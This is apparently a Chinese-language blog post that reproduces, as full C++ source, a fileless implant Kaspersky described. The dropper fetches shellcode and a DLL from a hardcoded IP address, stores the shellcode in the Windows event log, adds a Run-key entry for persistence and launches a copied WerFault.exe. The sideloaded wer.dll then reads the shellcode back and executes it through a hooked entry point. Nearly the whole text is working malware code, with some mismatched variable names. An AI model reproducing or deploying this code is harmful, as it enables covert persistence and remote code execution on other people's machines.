对卡巴斯基发现的一个将shellcode写入evenlog的植入物的复现

原文章:
https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/

EventShellcodeDropper
核心功能:下载shellcode和wer.dll,并将shellcode写入eventlog

#include <windows.h>
#include <iostream>
#include <objbase.h>

#import "C:\\Windows\\System32\\winhttpcom.dll" no_namespace
#pragma comment(lib, "ole32.lib")
#pragma comment(lib, "oleaut32.lib")

const IID IID_IWinHttpRequest =
{
  0x06f29373,
  0x5c5a,
  0x4b54,
  {0xb0, 0x25, 0x6e, 0xf1, 0xbf, 0x8a, 0xbf, 0x0e}
};

BOOL WriteEvents(PBYTE pBuffer,DWORD len) {
	HANDLE hEventLog;
	hEventLog = RegisterEventSourceW(0,L"Key Management Service");
	if (!ReportEventW(hEventLog, EVENTLOG_INFORMATION_TYPE, 0x4142, 9999, 0, 0, len, 0, (LPVOID)pBuffer)) {
		CloseEventLog(hEventLog);
		return FALSE;
	}
	CloseEventLog(hEventLog);
	return TRUE;
}


VOID DownloadFile(const wchar_t* chUrl,DWORD& dwLen,PBYTE buffer) {

    long UpperBounds;
    long LowerBounds;
    unsigned char* buff;
    // Variable for return value.
    HRESULT    hr;

    // Initialize COM.
    hr = CoInitialize(NULL);

    IWinHttpRequest* pIWinHttpRequest = NULL;

    VARIANT         varFalse;
    VARIANT         varEmpty;
    VARIANT            varResponse;

    VariantInit(&varResponse);

    CLSID           clsid;

    VariantInit(&varFalse);
    V_VT(&varFalse) = VT_BOOL;
    V_BOOL(&varFalse) = VARIANT_FALSE;

    VariantInit(&varEmpty);
    V_VT(&varEmpty) = VT_ERROR;

    hr = CLSIDFromProgID(L"WinHttp.WinHttpRequest.5.1", &clsid);

    if (SUCCEEDED(hr))
    {
        hr = CoCreateInstance(clsid, NULL,
            CLSCTX_INPROC_SERVER,
            IID_IWinHttpRequest,
            (void**)&pIWinHttpRequest);
    }

    // ==== Get binary (.gif) file and write it to disk. =========
    if (SUCCEEDED(hr))
    {    // Open WinHttpRequest for synchronous access.
        BSTR bstrMethod = SysAllocString(L"GET");
        BSTR bstrUrl = SysAllocString(url);
        hr = pIWinHttpRequest->Open(bstrMethod, bstrUrl, varFalse);
        SysFreeString(bstrMethod);
        SysFreeString(bstrUrl);
    }
    if (SUCCEEDED(hr))
    {    // Send Request.
        hr = pIWinHttpRequest->Send(varEmpty);
    }
    if (SUCCEEDED(hr))
    {    // Get response body.
        hr = pIWinHttpRequest->get_ResponseBody(&varResponse);
    }
    if (SUCCEEDED(hr))
    {
        if (varResponse.vt == (VT_ARRAY | VT_UI1)) {
            long Dims = SafeArrayGetDim(varResponse.parray);
            // The array should only have 1 dimension.
            if (Dims == 1) {
                // Get upper and lower array bounds.
                SafeArrayGetLBound(varResponse.parray, 1,
                    &LowerBounds);
                SafeArrayGetUBound(varResponse.parray, 1,
                    &UpperBounds);
                UpperBounds++;
                // Lock SAFEARRAY for access.
                SafeArrayAccessData(varResponse.parray,
                    (void**)&buff);

                //拷贝下载的文件到buffer
                memcpy(buffer, buff, (UpperBounds - LowerBounds));

                SafeArrayUnaccessData(varResponse.parray);
            }
        }
    }

    //获取下载的文件的长度
    dwLen = UpperBounds - LowerBounds;

    // Release memory.
    if (pIWinHttpRequest)
        pIWinHttpRequest->Release();

    CoUninitialize();

}

int main() {
	//拷贝文件
	CopyFileW(L"C:\\Windows\\system32\\WerFault.exe", L"C:\\Windows\\Tasks\\WerFault.exe", 0);
	//权限维持
	HKEY hResult;
	RegOpenKeyW(HKEY_CURRENT_USER, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", &result);
	RegSetValueExW(hResult, L"Windows Problem Reporting", 0, 1, (const BYTE*)L"C:\\Windows\\Tasks\\WerFault.exe", 0x3c);
	RegCloseKey(hResult);

	//写shellcode到事件
    DWORD dwCodeSize;
    PBYTE pShellcodeBytes = (PBYTE)malloc(0x10000);
    
    DownloadFile(L"http://150.158.212.148:8888/test.bin", dwCodeSize, pShellcodeBytes);

	if(!WriteEvents(pShellcodeBytes, dwCodeSize)) {
		return -1;
	}

	// Create file.
    HANDLE hFile;
    DWORD  dwBytesWritten;
    hFile = CreateFile(TEXT("C:\\Windows\\Tasks\\wer.dll"),
        GENERIC_WRITE,              // Open for writing. 
        0,                          // Do not share. 
        NULL,                       // No security. 
        CREATE_ALWAYS,              // Overwrite existing.
        FILE_ATTRIBUTE_NORMAL,      // Normal file.
        NULL);                      // No attribute template.

    if (hFile == INVALID_HANDLE_VALUE)
    {
        return -1;
    }
    else
    {
        DWORD dwFileSize;
        PBYTE pFileBytes = (PBYTE)malloc(0x10000);
        DownloadFile(L"http://150.158.212.148:8888/wer.dll", dwFileSize, pFileBytes);
        WriteFile(hFile, pFileBytes, dwFileSize, &dwBytesWritten, NULL);
    }
    
    CloseHandle(hFile);
	free(pShellcodeBytes);
	free(pFileBytes);
    //执行WerFault
    ShellExecuteA(0, "open", "C:\\Windows\\Tasks\\WerFault.exe", 0, 0, 0);

	return 0;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168

Wer.dll
核心功能:patch loader的入口点，从eventlog读取并执行shellcode，与原版的hook方式不同，原版使用了BlackBone中的inlineHook，不知道为啥我复现不成功，于是使用了VEH进行hook

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)
#pragma comment(linker, "/export:WerSysprepCleanup=C:\\Windows\\System32\\wer.WerSysprepCleanup,@1")
#pragma comment(linker, "/export:WerSysprepGeneralize=C:\\Windows\\System32\\wer.WerSysprepGeneralize,@2")
#pragma comment(linker, "/export:WerUnattendedSetup=C:\\Windows\\System32\\wer.WerUnattendedSetup,@3")
#pragma comment(linker, "/export:WerpAddAppCompatData=C:\\Windows\\System32\\wer.WerpAddAppCompatData,@4")
#pragma comment(linker, "/export:WerpAddIfRegisteredForAppLocalDump=C:\\Windows\\System32\\wer.WerpAddIfRegisteredForAppLocalDump,@5")
#pragma comment(linker, "/export:WerpAddMemoryBlock=C:\\Windows\\System32\\wer.WerpAddMemoryBlock,@6")
#pragma comment(linker, "/export:WerpAddRegisteredDataToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredDataToReport,@7")
#pragma comment(linker, "/export:WerpAddRegisteredDumpsToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredDumpsToReport,@8")
#pragma comment(linker, "/export:WerpAddRegisteredMetadataToReport=C:\\Windows\\System32\\wer.WerpAddRegisteredMetadataToReport,@9")
#pragma comment(linker, "/export:WerpArchiveReport=C:\\Windows\\System32\\wer.WerpArchiveReport,@10")
#pragma comment(linker, "/export:WerpCancelUpload=C:\\Windows\\System32\\wer.WerpCancelUpload,@11")
#pragma comment(linker, "/export:WerpCleanWer=C:\\Windows\\System32\\wer.WerpCleanWer,@12")
#pragma comment(linker, "/export:WerpCloseStore=C:\\Windows\\System32\\wer.WerpCloseStore,@13")
#pragma comment(linker, "/export:WerpCreateMachineStore=C:\\Windows\\System32\\wer.WerpCreateMachineStore,@14")
#pragma comment(linker, "/export:WerpDeleteReport=C:\\Windows\\System32\\wer.WerpDeleteReport,@15")
#pragma comment(linker, "/export:WerpDestroyWerString=C:\\Windows\\System32\\wer.WerpDestroyWerString,@16")
#pragma comment(linker, "/export:WerpEnumerateStoreNext=C:\\Windows\\System32\\wer.WerpEnumerateStoreNext,@17")
#pragma comment(linker, "/export:WerpEnumerateStoreStart=C:\\Windows\\System32\\wer.WerpEnumerateStoreStart,@18")
#pragma comment(linker, "/export:WerpFlushImageCache=C:\\Windows\\System32\\wer.WerpFlushImageCache,@19")
#pragma comment(linker, "/export:WerpForceDeferredCollection=C:\\Windows\\System32\\wer.WerpForceDeferredCollection,@20")
#pragma comment(linker, "/export:WerpFreeUnmappedVaRanges=C:\\Windows\\System32\\wer.WerpFreeUnmappedVaRanges,@21")
#pragma comment(linker, "/export:WerpGetBucketId=C:\\Windows\\System32\\wer.WerpGetBucketId,@22")
#pragma comment(linker, "/export:WerpGetDynamicParameter=C:\\Windows\\System32\\wer.WerpGetDynamicParameter,@23")
#pragma comment(linker, "/export:WerpGetEventType=C:\\Windows\\System32\\wer.WerpGetEventType,@24")
#pragma comment(linker, "/export:WerpGetExtendedDiagData=C:\\Windows\\System32\\wer.WerpGetExtendedDiagData,@25")
#pragma comment(linker, "/export:WerpGetFileByIndex=C:\\Windows\\System32\\wer.WerpGetFileByIndex,@26")
#pragma comment(linker, "/export:WerpGetFilePathByIndex=C:\\Windows\\System32\\wer.WerpGetFilePathByIndex,@27")
#pragma comment(linker, "/export:WerpGetLegacyBucketId=C:\\Windows\\System32\\wer.WerpGetLegacyBucketId,@28")
#pragma comment(linker, "/export:WerpGetLoadedModuleByIndex=C:\\Windows\\System32\\wer.WerpGetLoadedModuleByIndex,@29")
#pragma comment(linker, "/export:WerpGetNumFiles=C:\\Windows\\System32\\wer.WerpGetNumFiles,@30")
#pragma comment(linker, "/export:WerpGetNumLoadedModules=C:\\Windows\\System32\\wer.WerpGetNumLoadedModules,@31")
#pragma comment(linker, "/export:WerpGetNumSigParams=C:\\Windows\\System32\\wer.WerpGetNumSigParams,@32")
#pragma comment(linker, "/export:WerpGetPathOfWERTempDirectory=C:\\Windows\\System32\\wer.WerpGetPathOfWERTempDirectory,@33")
#pragma comment(linker, "/export:WerpGetReportCount=C:\\Windows\\System32\\wer.WerpGetReportCount,@34")
#pragma comment(linker, "/export:WerpGetReportFinalConsent=C:\\Windows\\System32\\wer.WerpGetReportFinalConsent,@35")
#pragma comment(linker, "/export:WerpGetReportFlags=C:\\Windows\\System32\\wer.WerpGetReportFlags,@36")
#pragma comment(linker, "/export:WerpGetReportId=C:\\Windows\\System32\\wer.WerpGetReportId,@37")
#pragma comment(linker, "/export:WerpGetReportInformation=C:\\Windows\\System32\\wer.WerpGetReportInformation,@38")
#pragma comment(linker, "/export:WerpGetReportSettings=C:\\Windows\\System32\\wer.WerpGetReportSettings,@39")
#pragma comment(linker, "/export:WerpGetReportTime=C:\\Windows\\System32\\wer.WerpGetReportTime,@40")
#pragma comment(linker, "/export:WerpGetReportType=C:\\Windows\\System32\\wer.WerpGetReportType,@41")
#pragma comment(linker, "/export:WerpGetResponseId=C:\\Windows\\System32\\wer.WerpGetResponseId,@42")
#pragma comment(linker, "/export:WerpGetSigParamByIndex=C:\\Windows\\System32\\wer.WerpGetSigParamByIndex,@43")
#pragma comment(linker, "/export:WerpGetStorePath=C:\\Windows\\System32\\wer.WerpGetStorePath,@44")
#pragma comment(linker, "/export:WerpGetStoreType=C:\\Windows\\System32\\wer.WerpGetStoreType,@45")
#pragma comment(linker, "/export:WerpGetTextFromReport=C:\\Windows\\System32\\wer.WerpGetTextFromReport,@46")
#pragma comment(linker, "/export:WerpGetUIParamByIndex=C:\\Windows\\System32\\wer.WerpGetUIParamByIndex,@47")
#pragma comment(linker, "/export:WerpGetUploadTime=C:\\Windows\\System32\\wer.WerpGetUploadTime,@48")
#pragma comment(linker, "/export:WerpGetWerStringData=C:\\Windows\\System32\\wer.WerpGetWerStringData,@49")
#pragma comment(linker, "/export:WerpGetWow64Process=C:\\Windows\\System32\\wer.WerpGetWow64Process,@50")
#pragma comment(linker, "/export:WerpHashApplicationParameters=C:\\Windows\\System32\\wer.WerpHashApplicationParameters,@51")
#pragma comment(linker, "/export:WerpInitializeImageCache=C:\\Windows\\System32\\wer.WerpInitializeImageCache,@52")
#pragma comment(linker, "/export:WerpIsOnBattery=C:\\Windows\\System32\\wer.WerpIsOnBattery,@53")
#pragma comment(linker, "/export:WerpIsTransportAvailable=C:\\Windows\\System32\\wer.WerpIsTransportAvailable,@54")
#pragma comment(linker, "/export:WerpLoadReportFromBuffer=C:\\Windows\\System32\\wer.WerpLoadReportFromBuffer,@55")
#pragma comment(linker, "/export:WerpOpenMachineArchive=C:\\Windows\\System32\\wer.WerpOpenMachineArchive,@56")
#pragma comment(linker, "/export:WerpOpenMachineQueue=C:\\Windows\\System32\\wer.WerpOpenMachineQueue,@57")
#pragma comment(linker, "/export:WerpPromptUser=C:\\Windows\\System32\\wer.WerpPromptUser,@58")
#pragma comment(linker, "/export:WerpPruneStore=C:\\Windows\\System32\\wer.WerpPruneStore,@59")
#pragma comment(linker, "/export:WerpReportCancel=C:\\Windows\\System32\\wer.WerpReportCancel,@60")
#pragma comment(linker, "/export:WerpReportSetMaxProcessHoldMilliseconds=C:\\Windows\\System32\\wer.WerpReportSetMaxProcessHoldMilliseconds,@61")
#pragma comment(linker, "/export:WerpReportSprintfParameter=C:\\Windows\\System32\\wer.WerpReportSprintfParameter,@62")
#pragma comment(linker, "/export:WerpReserveMachineQueueReportDir=C:\\Windows\\System32\\wer.WerpReserveMachineQueueReportDir,@63")
#pragma comment(linker, "/export:WerpResetTransientImageCacheStatistics=C:\\Windows\\System32\\wer.WerpResetTransientImageCacheStatistics,@64")
#pragma comment(linker, "/export:WerpRestartApplication=C:\\Windows\\System32\\wer.WerpRestartApplication,@65")
#pragma comment(linker, "/export:WerpSetDynamicParameter=C:\\Windows\\System32\\wer.WerpSetDynamicParameter,@66")
#pragma comment(linker, "/export:WerpSetEventName=C:\\Windows\\System32\\wer.WerpSetEventName,@67")
#pragma comment(linker, "/export:WerpSetProcessTimelines=C:\\Windows\\System32\\wer.WerpSetProcessTimelines,@68")
#pragma comment(linker, "/export:WerpSetQuickDumpType=C:\\Windows\\System32\\wer.WerpSetQuickDumpType,@69")
#pragma comment(linker, "/export:WerpSetReportApplicationIdentity=C:\\Windows\\System32\\wer.WerpSetReportApplicationIdentity,@70")
#pragma comment(linker, "/export:WerpSetReportFlags=C:\\Windows\\System32\\wer.WerpSetReportFlags,@71")
#pragma comment(linker, "/export:WerpSetReportInformation=C:\\Windows\\System32\\wer.WerpSetReportInformation,@72")
#pragma comment(linker, "/export:WerpSetReportIsFatal=C:\\Windows\\System32\\wer.WerpSetReportIsFatal,@73")
#pragma comment(linker, "/export:WerpSetReportNamespaceParameter=C:\\Windows\\System32\\wer.WerpSetReportNamespaceParameter,@74")
#pragma comment(linker, "/export:WerpSetReportTime=C:\\Windows\\System32\\wer.WerpSetReportTime,@75")
#pragma comment(linker, "/export:WerpSetReportUploadContextToken=C:\\Windows\\System32\\wer.WerpSetReportUploadContextToken,@76")
#pragma comment(linker, "/export:WerpSetTelemetryAppParams=C:\\Windows\\System32\\wer.WerpSetTelemetryAppParams,@77")
#pragma comment(linker, "/export:WerpSetTelemetryKernelParams=C:\\Windows\\System32\\wer.WerpSetTelemetryKernelParams,@78")
#pragma comment(linker, "/export:WerpSetTelemetryServiceParams=C:\\Windows\\System32\\wer.WerpSetTelemetryServiceParams,@79")
#pragma comment(linker, "/export:WerpShowUpsellUI=C:\\Windows\\System32\\wer.WerpShowUpsellUI,@80")
#pragma comment(linker, "/export:WerpStitchedMinidumpVmPostReadCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmPostReadCallback,@81")
#pragma comment(linker, "/export:WerpStitchedMinidumpVmPreReadCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmPreReadCallback,@82")
#pragma comment(linker, "/export:WerpStitchedMinidumpVmQueryCallback=C:\\Windows\\System32\\wer.WerpStitchedMinidumpVmQueryCallback,@83")
#pragma comment(linker, "/export:WerpSubmitReportFromStore=C:\\Windows\\System32\\wer.WerpSubmitReportFromStore,@84")
#pragma comment(linker, "/export:WerpTraceAuxMemDumpStatistics=C:\\Windows\\System32\\wer.WerpTraceAuxMemDumpStatistics,@85")
#pragma comment(linker, "/export:WerpTraceDuration=C:\\Windows\\System32\\wer.WerpTraceDuration,@86")
#pragma comment(linker, "/export:WerpTraceImageCacheStatistics=C:\\Windows\\System32\\wer.WerpTraceImageCacheStatistics,@87")
#pragma comment(linker, "/export:WerpTraceSnapshotStatistics=C:\\Windows\\System32\\wer.WerpTraceSnapshotStatistics,@88")
#pragma comment(linker, "/export:WerpTraceStitchedDumpWriterStatistics=C:\\Windows\\System32\\wer.WerpTraceStitchedDumpWriterStatistics,@89")
#pragma comment(linker, "/export:WerpTraceUnmappedVaRangesStatistics=C:\\Windows\\System32\\wer.WerpTraceUnmappedVaRangesStatistics,@90")
#pragma comment(linker, "/export:WerpUnmapProcessViews=C:\\Windows\\System32\\wer.WerpUnmapProcessViews,@91")
#pragma comment(linker, "/export:WerpValidateReportKey=C:\\Windows\\System32\\wer.WerpValidateReportKey,@92")
#pragma comment(linker, "/export:WerpWalkGatherBlocks=C:\\Windows\\System32\\wer.WerpWalkGatherBlocks,@93")
#pragma comment(linker, "/export:CloseThreadWaitChainSession=C:\\Windows\\System32\\wer.CloseThreadWaitChainSession,@94")
#pragma comment(linker, "/export:GetThreadWaitChain=C:\\Windows\\System32\\wer.GetThreadWaitChain,@95")
#pragma comment(linker, "/export:OpenThreadWaitChainSession=C:\\Windows\\System32\\wer.OpenThreadWaitChainSession,@96")
#pragma comment(linker, "/export:RegisterWaitChainCOMCallback=C:\\Windows\\System32\\wer.RegisterWaitChainCOMCallback,@97")
#pragma comment(linker, "/export:WerAddExcludedApplication=C:\\Windows\\System32\\wer.WerAddExcludedApplication,@98")
#pragma comment(linker, "/export:WerFreeString=C:\\Windows\\System32\\wer.WerFreeString,@99")
#pragma comment(linker, "/export:WerRemoveExcludedApplication=C:\\Windows\\System32\\wer.WerRemoveExcludedApplication,@100")
#pragma comment(linker, "/export:WerReportAddDump=C:\\Windows\\System32\\wer.WerReportAddDump,@101")
#pragma comment(linker, "/export:WerReportAddFile=C:\\Windows\\System32\\wer.WerReportAddFile,@102")
#pragma comment(linker, "/export:WerReportCloseHandle=C:\\Windows\\System32\\wer.WerReportCloseHandle,@103")
#pragma comment(linker, "/export:WerReportCreate=C:\\Windows\\System32\\wer.WerReportCreate,@104")
#pragma comment(linker, "/export:WerReportSetParameter=C:\\Windows\\System32\\wer.WerReportSetParameter,@105")
#pragma comment(linker, "/export:WerReportSetUIOption=C:\\Windows\\System32\\wer.WerReportSetUIOption,@106")
#pragma comment(linker, "/export:WerReportSubmit=C:\\Windows\\System32\\wer.WerReportSubmit,@107")
#pragma comment(linker, "/export:WerStoreClose=C:\\Windows\\System32\\wer.WerStoreClose,@108")
#pragma comment(linker, "/export:WerStoreGetFirstReportKey=C:\\Windows\\System32\\wer.WerStoreGetFirstReportKey,@109")
#pragma comment(linker, "/export:WerStoreGetNextReportKey=C:\\Windows\\System32\\wer.WerStoreGetNextReportKey,@110")
#pragma comment(linker, "/export:WerStoreGetReportCount=C:\\Windows\\System32\\wer.WerStoreGetReportCount,@111")
#pragma comment(linker, "/export:WerStoreGetSizeOnDisk=C:\\Windows\\System32\\wer.WerStoreGetSizeOnDisk,@112")
#pragma comment(linker, "/export:WerStoreOpen=C:\\Windows\\System32\\wer.WerStoreOpen,@113")
#pragma comment(linker, "/export:WerStorePurge=C:\\Windows\\System32\\wer.WerStorePurge,@114")
#pragma comment(linker, "/export:WerStoreQueryReportMetadataV1=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV1,@115")
#pragma comment(linker, "/export:WerStoreQueryReportMetadataV2=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV2,@116")
#pragma comment(linker, "/export:WerStoreQueryReportMetadataV3=C:\\Windows\\System32\\wer.WerStoreQueryReportMetadataV3,@117")
#pragma comment(linker, "/export:WerStoreUploadReport=C:\\Windows\\System32\\wer.WerStoreUploadReport,@118")
#pragma comment(linker, "/export:WerpAddFile=C:\\Windows\\System32\\wer.WerpAddFile,@119")
#pragma comment(linker, "/export:WerpAddFileBuffer=C:\\Windows\\System32\\wer.WerpAddFileBuffer,@120")
#pragma comment(linker, "/export:WerpAddFileCallback=C:\\Windows\\System32\\wer.WerpAddFileCallback,@121")
#pragma comment(linker, "/export:WerpAddTerminationReason=C:\\Windows\\System32\\wer.WerpAddTerminationReason,@122")
#pragma comment(linker, "/export:WerpAuxmdDumpProcessImages=C:\\Windows\\System32\\wer.WerpAuxmdDumpProcessImages,@123")
#pragma comment(linker, "/export:WerpAuxmdDumpRegisteredBlocks=C:\\Windows\\System32\\wer.WerpAuxmdDumpRegisteredBlocks,@124")
#pragma comment(linker, "/export:WerpAuxmdFree=C:\\Windows\\System32\\wer.WerpAuxmdFree,@125")
#pragma comment(linker, "/export:WerpAuxmdFreeCopyBuffer=C:\\Windows\\System32\\wer.WerpAuxmdFreeCopyBuffer,@126")
#pragma comment(linker, "/export:WerpAuxmdHashVaRanges=C:\\Windows\\System32\\wer.WerpAuxmdHashVaRanges,@127")
#pragma comment(linker, "/export:WerpAuxmdInitialize=C:\\Windows\\System32\\wer.WerpAuxmdInitialize,@128")
#pragma comment(linker, "/export:WerpAuxmdMapFile=C:\\Windows\\System32\\wer.WerpAuxmdMapFile,@129")
#pragma comment(linker, "/export:WerpCreateIntegratorReportId=C:\\Windows\\System32\\wer.WerpCreateIntegratorReportId,@130")
#pragma comment(linker, "/export:WerpExtractReportFiles=C:\\Windows\\System32\\wer.WerpExtractReportFiles,@131")
#pragma comment(linker, "/export:WerpFreeString=C:\\Windows\\System32\\wer.WerpFreeString,@132")
#pragma comment(linker, "/export:WerpGetIntegratorReportId=C:\\Windows\\System32\\wer.WerpGetIntegratorReportId,@133")
#pragma comment(linker, "/export:WerpGetReportConsent=C:\\Windows\\System32\\wer.WerpGetReportConsent,@134")
#pragma comment(linker, "/export:WerpGetStoreLocation=C:\\Windows\\System32\\wer.WerpGetStoreLocation,@135")
#pragma comment(linker, "/export:WerpIsDisabled=C:\\Windows\\System32\\wer.WerpIsDisabled,@136")
#pragma comment(linker, "/export:WerpLoadReport=C:\\Windows\\System32\\wer.WerpLoadReport,@137")
#pragma comment(linker, "/export:WerpSetAuxiliaryArchivePath=C:\\Windows\\System32\\wer.WerpSetAuxiliaryArchivePath,@138")
#pragma comment(linker, "/export:WerpSetCallBack=C:\\Windows\\System32\\wer.WerpSetCallBack,@139")
#pragma comment(linker, "/export:WerpSetDefaultUserConsent=C:\\Windows\\System32\\wer.WerpSetDefaultUserConsent,@140")
#pragma comment(linker, "/export:WerpSetExitListeners=C:\\Windows\\System32\\wer.WerpSetExitListeners,@141")
#pragma comment(linker, "/export:WerpSetIntegratorReportId=C:\\Windows\\System32\\wer.WerpSetIntegratorReportId,@142")
#pragma comment(linker, "/export:WerpSetIptEnabled=C:\\Windows\\System32\\wer.WerpSetIptEnabled,@143")
#pragma comment(linker, "/export:WerpSetReportOption=C:\\Windows\\System32\\wer.WerpSetReportOption,@144")
#pragma comment(linker, "/export:WerpSetTtdStatus=C:\\Windows\\System32\\wer.WerpSetTtdStatus,@145")

HANDLE hThreadHandle = NULL;

BOOL ReadEvents(PBYTE pBuffer,DWORD dwLen) {
	HANDLE hEventLog;
	DWORD dwReadlen;
	DWORD dwnextlen;

	hEventLog = OpenEventLogW(0, L"Key Management Service");

	while (ReadEventLog(hEventLog, EVENTLOG_FORWARDS_READ | EVENTLOG_SEQUENTIAL_READ, 1, (EVENTLOGRECORD*)pBuffer, len, &dwReadlen, &dwnextlen)) {
		for (DWORD i = 0; i < dwReadlen; i++) {
			EVENTLOGRECORD* ptr = (EVENTLOGRECORD*)(pBuffer + i);
			if (ptr->EventID == 9999)
			{
				pBuffer = pBuffer + i;
				CloseEventLog(hEventLog);
				return TRUE;
			}
		}
	};

	CloseEventLog(hEventLog);
	return FALSE;
}

BOOL WriteMemory(BYTE* pAddress, BYTE* pData, DWORD dwDataLength)
{
	for (DWORD i = 0; i < dwDataLength; i++)
	{
		InterlockedExchange64((LONG64*)(pAddress + i), *(pData + i));
	}
	if (memcmp(pAddress, pData, dwDataLength) != 0) {

		return 1;
	}

	return 0;
}

VOID ExecuteShellcode() {

	DWORD dwLen = 0x10000;
	PBYTE pShellcode = (PBYTE)malloc(dwLen);

	//从eventlog中读取shellcode
	ReadEvents(pShellcode, dwLen);
	
	//为shellcode申请内存空间
	HANDLE hHep = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0);
	PBYTE pMem = (PBYTE)HeapAlloc(hHep, 0, ((PEVENTLOGRECORD)pShellcode)->DataLength);
	
	//将shellcode写入申请的内存空间
	WriteMemory(pMem, (BYTE*)(pShellcode + ((PEVENTLOGRECORD)pShellcode)->DataOffset), ((PEVENTLOGRECORD)pShellcode)->DataLength);
	free(pShellcode);
	//回调函数执行shellcode
	EnumChildWindows((HWND)NULL, (WNDENUMPROC)pMem, NULL);
}

LONG NTAPI VEH(PEXCEPTION_POINTERS pExcepInfo)
{

	if (pExcepInfo->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)
	{
		//阻断WerFault正常执行流程，让主线程等待shellcode线程结束
		WaitForSingleObjectEx(hThreadHandle, INFINITE, TRUE);

		return EXCEPTION_CONTINUE_EXECUTION;
	}


	return EXCEPTION_CONTINUE_SEARCH;
}

VOID Patch() {

	HMODULE hLoaderImage = GetModuleHandleA(NULL);
	DWORD lpflOldProtect;
	PBYTE pLoaderEntryPoint = (PBYTE)hLoaderImage + *(DWORD*)((PBYTE)hLoaderImage + *((DWORD*)hLoaderImage + 15) + 40);
	
	/*
	VirtualProtect(loaderEntryPoint, 0xc, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
	*loaderEntryPoint = 0xb848;
	*(loaderEntryPoint + 2) = (LONGLONG)*ExecuteShellcode;//函数指针解引用就是函数的首地址
	*(loaderEntryPoint + 5) = 0xE0FF;
	VirtualProtect(loaderEntryPoint, 0xc, lpflOldProtect, &lpflOldProtect);
	*/

	//设置int 3断点
	VirtualProtect(pLoaderEntryPoint , 4, PAGE_EXECUTE_READWRITE, &lpflOldProtect);
	*(loaderEntryPoint) = 0xcc;
	VirtualProtect(pLoaderEntryPoint , 4, lpflOldProtect, &lpflOldProtect);
	//添加VEH异常的回调
	AddVectoredExceptionHandler(0, &VEH);
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
		hThreadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExecuteShellcode, NULL, 0, NULL);
		Patch();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264